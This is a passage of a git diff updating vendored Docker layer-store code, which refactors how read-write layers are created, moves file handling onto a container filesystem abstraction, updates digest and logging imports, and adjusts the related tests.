@@ -177,7 +185,7 @@ type Store interface { Map() map[ChainID]Layer Release(Layer) ([]Metadata, error) - CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) + CreateRWLayer(id string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error) GetRWLayer(id string) (RWLayer, error) GetMountID(id string) (string, error) ReleaseRWLayer(RWLayer) ([]Metadata, error) @@ -193,52 +201,6 @@ type DescribableStore interface { RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error) } -// MetadataTransaction represents functions for setting layer metadata -// with a single transaction. -type MetadataTransaction interface { - SetSize(int64) error - SetParent(parent ChainID) error - SetDiffID(DiffID) error - SetCacheID(string) error - SetDescriptor(distribution.Descriptor) error - TarSplitWriter(compressInput bool) (io.WriteCloser, error) - - Commit(ChainID) error - Cancel() error - String() string -} - -// MetadataStore represents a backend for persisting -// metadata about layers and providing the metadata -// for restoring a Store. -type MetadataStore interface { - // StartTransaction starts an update for new metadata - // which will be used to represent an ID on commit. 
- StartTransaction() (MetadataTransaction, error) - - GetSize(ChainID) (int64, error) - GetParent(ChainID) (ChainID, error) - GetDiffID(ChainID) (DiffID, error) - GetCacheID(ChainID) (string, error) - GetDescriptor(ChainID) (distribution.Descriptor, error) - TarSplitReader(ChainID) (io.ReadCloser, error) - - SetMountID(string, string) error - SetInitID(string, string) error - SetMountParent(string, ChainID) error - - GetMountID(string) (string, error) - GetInitID(string) (string, error) - GetMountParent(string) (ChainID, error) - - // List returns the full list of referenced - // read-only and read-write layers - List() ([]ChainID, []string, error) - - Remove(ChainID) error - RemoveMount(string) error -} - // CreateChainID returns ID for a layerDigest slice func CreateChainID(dgsts []DiffID) ChainID { return createChainIDFromParent("", dgsts...) diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go index 1a1ff9fe59..c1fbf85091 100644 --- a/vendor/github.com/docker/docker/layer/layer_store.go +++ b/vendor/github.com/docker/docker/layer/layer_store.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" @@ -7,13 +7,14 @@ import ( "io/ioutil" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/asm" "github.com/vbatts/tar-split/tar/storage" ) @@ -26,62 +27,76 @@ import ( const maxLayerDepth = 125 type layerStore struct { - store MetadataStore - driver graphdriver.Driver + store *fileMetadataStore + driver graphdriver.Driver + useTarSplit bool layerMap map[ChainID]*roLayer layerL 
sync.Mutex mounts map[string]*mountedLayer mountL sync.Mutex + os string } // StoreOptions are the options used to create a new Store instance type StoreOptions struct { - StorePath string + Root string MetadataStorePathTemplate string GraphDriver string GraphDriverOptions []string - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap + IDMappings *idtools.IDMappings PluginGetter plugingetter.PluginGetter ExperimentalEnabled bool + OS string } // NewStoreFromOptions creates a new Store instance func NewStoreFromOptions(options StoreOptions) (Store, error) { driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{ - Root: options.StorePath, + Root: options.Root, DriverOptions: options.GraphDriverOptions, - UIDMaps: options.UIDMaps, - GIDMaps: options.GIDMaps, + UIDMaps: options.IDMappings.UIDs(), + GIDMaps: options.IDMappings.GIDs(), ExperimentalEnabled: options.ExperimentalEnabled, }) if err != nil { return nil, fmt.Errorf("error initializing graphdriver: %v", err) } - logrus.Debugf("Using graph driver %s", driver) + logrus.Debugf("Initialized graph driver %s", driver) - fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver)) - if err != nil { - return nil, err - } + root := fmt.Sprintf(options.MetadataStorePathTemplate, driver) - return NewStoreFromGraphDriver(fms, driver) + return newStoreFromGraphDriver(root, driver, options.OS) } -// NewStoreFromGraphDriver creates a new Store instance using the provided +// newStoreFromGraphDriver creates a new Store instance using the provided // metadata store and graph driver. The metadata store will be used to restore // the Store. 
-func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) { +func newStoreFromGraphDriver(root string, driver graphdriver.Driver, os string) (Store, error) { + if !system.IsOSSupported(os) { + return nil, fmt.Errorf("failed to initialize layer store as operating system '%s' is not supported", os) + } + caps := graphdriver.Capabilities{} + if capDriver, ok := driver.(graphdriver.CapabilityDriver); ok { + caps = capDriver.Capabilities() + } + + ms, err := newFSMetadataStore(root) + if err != nil { + return nil, err + } + ls := &layerStore{ - store: store, - driver: driver, - layerMap: map[ChainID]*roLayer{}, - mounts: map[string]*mountedLayer{}, + store: ms, + driver: driver, + layerMap: map[ChainID]*roLayer{}, + mounts: map[string]*mountedLayer{}, + useTarSplit: !caps.ReproducesExactDiffs, + os: os, } - ids, mounts, err := store.List() + ids, mounts, err := ms.List() if err != nil { return nil, err } @@ -106,6 +121,10 @@ func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (St return ls, nil } +func (ls *layerStore) Driver() graphdriver.Driver { + return ls.driver +} + func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { cl, ok := ls.layerMap[layer] if ok { @@ -137,6 +156,15 @@ func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err) } + os, err := ls.store.getOS(layer) + if err != nil { + return nil, fmt.Errorf("failed to get operating system for %s: %s", layer, err) + } + + if os != ls.os { + return nil, fmt.Errorf("failed to load layer with os %s into layerstore for %s", os, ls.os) + } + cl = &roLayer{ chainID: layer, diffID: diff, @@ -203,22 +231,25 @@ func (ls *layerStore) loadMount(mount string) error { return nil } -func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { - digester := digest.Canonical.New() +func (ls *layerStore) applyTar(tx 
*fileMetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { + digester := digest.Canonical.Digester() tr := io.TeeReader(ts, digester.Hash()) - tsw, err := tx.TarSplitWriter(true) - if err != nil { - return err - } - metaPacker := storage.NewJSONPacker(tsw) - defer tsw.Close() + rdr := tr + if ls.useTarSplit { + tsw, err := tx.TarSplitWriter(true) + if err != nil { + return err + } + metaPacker := storage.NewJSONPacker(tsw) + defer tsw.Close() - // we're passing nil here for the file putter, because the ApplyDiff will - // handle the extraction of the archive - rdr, err := asm.NewInputTarStream(tr, metaPacker, nil) - if err != nil { - return err + // we're passing nil here for the file putter, because the ApplyDiff will + // handle the extraction of the archive + rdr, err = asm.NewInputTarStream(tr, metaPacker, nil) + if err != nil { + return err + } } applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr) @@ -248,6 +279,7 @@ func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descr var err error var pid string var p *roLayer + if string(parent) != "" { p = ls.get(parent) if p == nil { @@ -378,7 +410,6 @@ func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error { if err != nil { return err } - err = ls.store.Remove(layer.chainID) if err != nil { return err @@ -445,7 +476,19 @@ func (ls *layerStore) Release(l Layer) ([]Metadata, error) { return ls.releaseLayer(layer) } -func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) { +func (ls *layerStore) CreateRWLayer(name string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error) { + var ( + storageOpt map[string]string + initFunc MountInit + mountLabel string + ) + + if opts != nil { + mountLabel = opts.MountLabel + storageOpt = opts.StorageOpt + initFunc = opts.InitFunc + } + ls.mountL.Lock() defer ls.mountL.Unlock() m, ok := ls.mounts[name] @@ 
-496,7 +539,6 @@ func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel stri if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil { return nil, err } - if err = ls.saveMount(m); err != nil { return nil, err } @@ -628,6 +670,34 @@ func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc Mou return initID, nil } +func (ls *layerStore) getTarStream(rl *roLayer) (io.ReadCloser, error) { + if !ls.useTarSplit { + var parentCacheID string + if rl.parent != nil { + parentCacheID = rl.parent.cacheID + } + + return ls.driver.Diff(rl.cacheID, parentCacheID) + } + + r, err := ls.store.TarSplitReader(rl.chainID) + if err != nil { + return nil, err + } + + pr, pw := io.Pipe() + go func() { + err := ls.assembleTarTo(rl.cacheID, r, nil, pw) + if err != nil { + pw.CloseWithError(err) + } else { + pw.Close() + } + }() + + return pr, nil +} + func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error { diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver) if !ok { @@ -680,5 +750,5 @@ func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser, if err != nil { return nil, err } - return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil + return &fileGetPutter{storage.NewPathFileGetter(p.Path()), n.Driver, id}, nil } diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go b/vendor/github.com/docker/docker/layer/layer_store_windows.go index 1276a912cc..eca1f6a83b 100644 --- a/vendor/github.com/docker/docker/layer/layer_store_windows.go +++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go index 10712df998..5c4e8fab19 100644 --- a/vendor/github.com/docker/docker/layer/layer_test.go +++ 
b/vendor/github.com/docker/docker/layer/layer_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "bytes" @@ -10,17 +10,20 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" + "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/vfs" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/go-digest" ) func init() { graphdriver.ApplyUncompressedLayer = archive.UnpackLayer - vfs.CopyWithTar = archive.CopyWithTar + defaultArchiver := archive.NewDefaultArchiver() + vfs.CopyDir = defaultArchiver.CopyWithTar } func newVFSGraphDriver(td string) (graphdriver.Driver, error) { @@ -66,11 +69,8 @@ func newTestStore(t *testing.T) (Store, string, func()) { } graph, graphcleanup := newTestGraphDriver(t) - fms, err := NewFSMetadataStore(td) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + + ls, err := newStoreFromGraphDriver(td, graph, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -81,21 +81,21 @@ func newTestStore(t *testing.T) (Store, string, func()) { } } -type layerInit func(root string) error +type layerInit func(root containerfs.ContainerFS) error func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { containerID := stringid.GenerateRandomID() - mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil) + mount, err := ls.CreateRWLayer(containerID, parent, nil) if err != nil { return nil, err } - path, err := mount.Mount("") + pathFS, err := mount.Mount("") if err != nil { return nil, err } - if err := layerFunc(path); err != nil { + if err := layerFunc(pathFS); err != nil { return nil, err } @@ -122,7 +122,7 @@ func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { } type FileApplier 
interface { - ApplyFile(root string) error + ApplyFile(root containerfs.ContainerFS) error } type testFile struct { @@ -139,25 +139,22 @@ func newTestFile(name string, content []byte, perm os.FileMode) FileApplier { } } -func (tf *testFile) ApplyFile(root string) error { - fullPath := filepath.Join(root, tf.name) - if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil { +func (tf *testFile) ApplyFile(root containerfs.ContainerFS) error { + fullPath := root.Join(root.Path(), tf.name) + if err := root.MkdirAll(root.Dir(fullPath), 0755); err != nil { return err } // Check if already exists - if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { - if err := os.Chmod(fullPath, tf.permission); err != nil { + if stat, err := root.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { + if err := root.Lchmod(fullPath, tf.permission); err != nil { return err } } - if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil { - return err - } - return nil + return driver.WriteFile(root, fullPath, tf.content, tf.permission) } func initWithFiles(files ...FileApplier) layerInit { - return func(root string) error { + return func(root containerfs.ContainerFS) error { for _, f := range files { if err := f.ApplyFile(root); err != nil { return err @@ -231,7 +228,7 @@ func cacheID(l Layer) string { func assertLayerEqual(t *testing.T, l1, l2 Layer) { if l1.ChainID() != l2.ChainID() { - t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID()) + t.Fatalf("Mismatched ChainID: %s vs %s", l1.ChainID(), l2.ChainID()) } if l1.DiffID() != l2.DiffID() { t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID()) @@ -277,7 +274,7 @@ func TestMountAndRegister(t *testing.T) { size, _ := layer.Size() t.Logf("Layer size: %d", size) - mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil) + mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), nil) if err != nil { t.Fatal(err) 
} @@ -287,7 +284,7 @@ func TestMountAndRegister(t *testing.T) { t.Fatal(err) } - b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt")) + b, err := driver.ReadFile(path2, path2.Join(path2.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } @@ -385,17 +382,17 @@ func TestStoreRestore(t *testing.T) { t.Fatal(err) } - m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil) + m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), nil) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt"), []byte("nothing here"), 0644); err != nil { t.Fatal(err) } @@ -403,7 +400,7 @@ func TestStoreRestore(t *testing.T) { t.Fatal(err) } - ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver) + ls2, err := newStoreFromGraphDriver(ls.(*layerStore).store.root, ls.(*layerStore).driver, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -416,7 +413,7 @@ func TestStoreRestore(t *testing.T) { assertLayerEqual(t, layer3b, layer3) // Create again with same name, should return error - if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil { + if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), nil); err == nil { t.Fatal("Expected error creating mount with same name") } else if err != ErrMountNameConflict { t.Fatal(err) @@ -429,20 +426,20 @@ func TestStoreRestore(t *testing.T) { if mountPath, err := m2.Mount(""); err != nil { t.Fatal(err) - } else if path != mountPath { - t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } else if pathFS.Path() != mountPath.Path() { + t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path()) } if mountPath, err := m2.Mount(""); err != nil { t.Fatal(err) - } 
else if path != mountPath { - t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } else if pathFS.Path() != mountPath.Path() { + t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path()) } if err := m2.Unmount(); err != nil { t.Fatal(err) } - b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt")) + b, err := driver.ReadFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } @@ -617,7 +614,7 @@ func tarFromFiles(files ...FileApplier) ([]byte, error) { defer os.RemoveAll(td) for _, f := range files { - if err := f.ApplyFile(td); err != nil { + if err := f.ApplyFile(containerfs.NewLocalContainerFS(td)); err != nil { return nil, err } } diff --git a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go index 776b78ac02..002c7ff838 100644 --- a/vendor/github.com/docker/docker/layer/layer_unix.go +++ b/vendor/github.com/docker/docker/layer/layer_unix.go @@ -1,6 +1,6 @@ -// +build linux freebsd darwin openbsd solaris +// +build linux freebsd darwin openbsd -package layer +package layer // import "github.com/docker/docker/layer" import "github.com/docker/docker/pkg/stringid" diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go index 9aa1afd597..6830158131 100644 --- a/vendor/github.com/docker/docker/layer/layer_unix_test.go +++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go @@ -1,8 +1,10 @@ // +build !windows -package layer +package layer // import "github.com/docker/docker/layer" -import "testing" +import ( + "testing" +) func graphDiffSize(ls Store, l Layer) (int64, error) { cl := getCachedLayer(l) diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go index e20311a091..25ef26afc1 100644 --- a/vendor/github.com/docker/docker/layer/layer_windows.go +++ 
b/vendor/github.com/docker/docker/layer/layer_windows.go @@ -1,14 +1,16 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" - "fmt" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - "github.com/docker/docker/daemon/graphdriver" ) +// Getter is an interface to get the path to a layer on the host. +type Getter interface { + // GetLayerPath gets the path for the layer. This is different from Get() + // since that returns an interface to account for umountable layers. + GetLayerPath(id string) (string, error) +} + // GetLayerPath returns the path to a layer func GetLayerPath(s Store, layer ChainID) (string, error) { ls, ok := s.(*layerStore) @@ -23,6 +25,9 @@ func GetLayerPath(s Store, layer ChainID) (string, error) { return "", ErrLayerDoesNotExist } + if layerGetter, ok := ls.driver.(Getter); ok { + return layerGetter.GetLayerPath(rl.cacheID) + } path, err := ls.driver.Get(rl.cacheID, "") if err != nil { return "", err @@ -32,67 +37,10 @@ func GetLayerPath(s Store, layer ChainID) (string, error) { return "", err } - return path, nil -} - -func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) { - var err error // this is used for cleanup in existingLayer case - diffID := digest.FromBytes([]byte(graphID)) - - // Create new roLayer - layer := &roLayer{ - cacheID: graphID, - diffID: DiffID(diffID), - referenceCount: 1, - layerStore: ls, - references: map[Layer]struct{}{}, - size: size, - } - - tx, err := ls.store.StartTransaction() - if err != nil { - return nil, err - } - defer func() { - if err != nil { - if err := tx.Cancel(); err != nil { - logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) - } - } - }() - - layer.chainID = createChainIDFromParent("", layer.diffID) - - if !ls.driver.Exists(layer.cacheID) { - return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID) - } - if err = storeLayer(tx, layer); err != nil { - return nil, err 
- } - - ls.layerL.Lock() - defer ls.layerL.Unlock() - - if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { - // Set error for cleanup, but do not return - err = errors.New("layer already exists") - return existingLayer.getReference(), nil - } - - if err = tx.Commit(layer.chainID); err != nil { - return nil, err - } - - ls.layerMap[layer.chainID] = layer - - return layer.getReference(), nil + return path.Path(), nil } func (ls *layerStore) mountID(name string) string { // windows has issues if container ID doesn't match mount ID return name } - -func (ls *layerStore) GraphDriver() graphdriver.Driver { - return ls.driver -} diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go index b45c31099d..2668ea96bb 100644 --- a/vendor/github.com/docker/docker/layer/migration.go +++ b/vendor/github.com/docker/docker/layer/migration.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "compress/gzip" @@ -7,8 +7,8 @@ import ( "io" "os" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/asm" "github.com/vbatts/tar-split/tar/storage" ) @@ -16,7 +16,7 @@ import ( // CreateRWLayerByGraphID creates a RWLayer in the layer store using // the provided name with the given graphID. To get the RWLayer // after migration the layer may be retrieved by the given name. 
-func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) { +func (ls *layerStore) CreateRWLayerByGraphID(name, graphID string, parent ChainID) (err error) { ls.mountL.Lock() defer ls.mountL.Unlock() m, ok := ls.mounts[name] @@ -68,11 +68,7 @@ func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent m.initID = initID } - if err = ls.saveMount(m); err != nil { - return err - } - - return nil + return ls.saveMount(m) } func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) { @@ -98,7 +94,7 @@ func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataP return } - dgst := digest.Canonical.New() + dgst := digest.Canonical.Digester() err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash()) if err != nil { return diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go index 07b4b68f8f..923166371c 100644 --- a/vendor/github.com/docker/docker/layer/migration_test.go +++ b/vendor/github.com/docker/docker/layer/migration_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "bytes" @@ -90,11 +90,8 @@ func TestLayerMigration(t *testing.T) { t.Fatal(err) } - fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + root := filepath.Join(td, "layers") + ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -218,11 +215,8 @@ func TestLayerMigrationNoTarsplit(t *testing.T) { t.Fatal(err) } - fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + root := filepath.Join(td, "layers") + ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS) if err != nil { t.Fatal(err) 
} @@ -380,7 +374,7 @@ func TestMountMigration(t *testing.T) { Kind: archive.ChangeAdd, }) - if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil { + if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), nil); err == nil { t.Fatal("Expected error creating mount with same name") } else if err != ErrMountNameConflict { t.Fatal(err) diff --git a/vendor/github.com/docker/docker/layer/mount_test.go b/vendor/github.com/docker/docker/layer/mount_test.go index 7a8637eae9..1cfc370eed 100644 --- a/vendor/github.com/docker/docker/layer/mount_test.go +++ b/vendor/github.com/docker/docker/layer/mount_test.go @@ -1,14 +1,14 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io/ioutil" - "os" - "path/filepath" "runtime" "sort" "testing" + "github.com/containerd/continuity/driver" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" ) func TestMountInit(t *testing.T) { @@ -28,30 +28,33 @@ func TestMountInit(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + mountInit := func(root containerfs.ContainerFS) error { return initfile.ApplyFile(root) } - m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil) + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } + m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - f, err := os.Open(filepath.Join(path, "testfile.txt")) + fi, err := pathFS.Stat(pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } - defer f.Close() - fi, err := f.Stat() + f, err := pathFS.Open(pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } + defer f.Close() b, err := ioutil.ReadAll(f) if err != nil { @@ -85,21 +88,24 @@ func TestMountSize(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + 
mountInit := func(root containerfs.ContainerFS) error { return newTestFile("file-init", contentInit, 0777).ApplyFile(root) } + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } - m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil) + m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "file2"), content2, 0755); err != nil { t.Fatal(err) } @@ -134,37 +140,40 @@ func TestMountChanges(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + mountInit := func(root containerfs.ContainerFS) error { return initfile.ApplyFile(root) } + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } - m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil) + m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil { + if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile1.txt"), 0755); err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile1.txt"), []byte("mount data!"), 0755); err != nil { t.Fatal(err) } - if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil { + if err := pathFS.Remove(pathFS.Join(pathFS.Path(), "testfile2.txt")); err != nil { t.Fatal(err) } - if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil { + if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile3.txt"), 0755); err != nil { 
t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile4.txt"), []byte("mount data!"), 0644); err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go index a5cfcfa9bd..d6858c662c 100644 --- a/vendor/github.com/docker/docker/layer/mounted_layer.go +++ b/vendor/github.com/docker/docker/layer/mounted_layer.go @@ -1,9 +1,10 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" ) type mountedLayer struct { @@ -88,7 +89,7 @@ type referencedRWLayer struct { *mountedLayer } -func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) { +func (rl *referencedRWLayer) Mount(mountLabel string) (containerfs.ContainerFS, error) { return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel) } diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go index 7c8d233a35..3555e8b027 100644 --- a/vendor/github.com/docker/docker/layer/ro_layer.go +++ b/vendor/github.com/docker/docker/layer/ro_layer.go @@ -1,11 +1,11 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "fmt" "io" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) type roLayer struct { @@ -21,31 +21,22 @@ type roLayer struct { references map[Layer]struct{} } -// TarStream for roLayer guarentees that the data that is produced is the exact +// TarStream for roLayer guarantees that the data that is produced is the exact // data that the layer was registered with. 
func (rl *roLayer) TarStream() (io.ReadCloser, error) { - r, err := rl.layerStore.store.TarSplitReader(rl.chainID) + rc, err := rl.layerStore.getTarStream(rl) if err != nil { return nil, err } - pr, pw := io.Pipe() - go func() { - err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw) - if err != nil { - pw.CloseWithError(err) - } else { - pw.Close() - } - }() - rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID)) + vrc, err := newVerifiedReadCloser(rc, digest.Digest(rl.diffID)) if err != nil { return nil, err } - return rc, nil + return vrc, nil } -// TarStreamFrom does not make any guarentees to the correctness of the produced +// TarStreamFrom does not make any guarantees to the correctness of the produced // data. As such it should not be used when the layer content must be verified // to be an exact match to the registered layer. func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { @@ -63,6 +54,10 @@ func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID) } +func (rl *roLayer) CacheID() string { + return rl.cacheID +} + func (rl *roLayer) ChainID() ChainID { return rl.chainID } @@ -130,7 +125,7 @@ func (rl *roLayer) depth() int { return rl.parent.depth() + 1 } -func storeLayer(tx MetadataTransaction, layer *roLayer) error { +func storeLayer(tx *fileMetadataTransaction, layer *roLayer) error { if err := tx.SetDiffID(layer.diffID); err != nil { return err } @@ -151,19 +146,14 @@ func storeLayer(tx MetadataTransaction, layer *roLayer) error { return err } } - - return nil + return tx.setOS(layer.layerStore.os) } func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) { - verifier, err := digest.NewDigestVerifier(dgst) - if err != nil { - return nil, 